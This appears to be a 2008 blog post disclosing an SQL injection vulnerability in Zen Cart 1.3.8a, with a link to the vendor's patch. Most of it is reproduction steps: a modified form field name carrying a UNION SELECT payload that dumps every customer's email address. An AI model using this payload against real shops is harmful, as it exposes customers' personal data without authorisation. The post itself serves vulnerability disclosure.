Yahoo Live dies on December 3rd
November 6, 2008Oracle Recommends Achievo ATK PHP Framework
November 8, 2008Unfortunately an sql injection vulnerability was discovered in Zencart v.1.3.8a
In order to test it please follow some simple steps:
1. go to the product listing page by clicking a category
2. save the page on your pc, open it in a text editor and modify (assuming there is a product with the id 111 or whatever….)
<input name=”products_id[111]” size=”4″ type=”text” value=”0″ />
to
<input name=”products_id[-1′ union select GROUP_CONCAT(customers_email_address), 2 from customers/*] ” size=”4″ type=”text” value=”0″ />
3. submit the form by adding at least one product to cart for the modified input box.
The result will be that a comma separated list of all customer emails will be shown.
In order to protect against this attack you can apply the following security patch:
http://www.zen-cart.com/forum/showthread.php?p=604473
